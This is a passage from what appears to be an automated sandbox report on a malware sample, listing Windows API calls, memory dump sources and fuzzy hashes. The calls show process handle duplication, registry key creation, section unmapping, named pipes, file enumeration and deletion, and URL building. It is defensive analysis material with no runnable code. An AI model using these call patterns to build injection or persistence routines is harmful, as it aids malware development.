  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
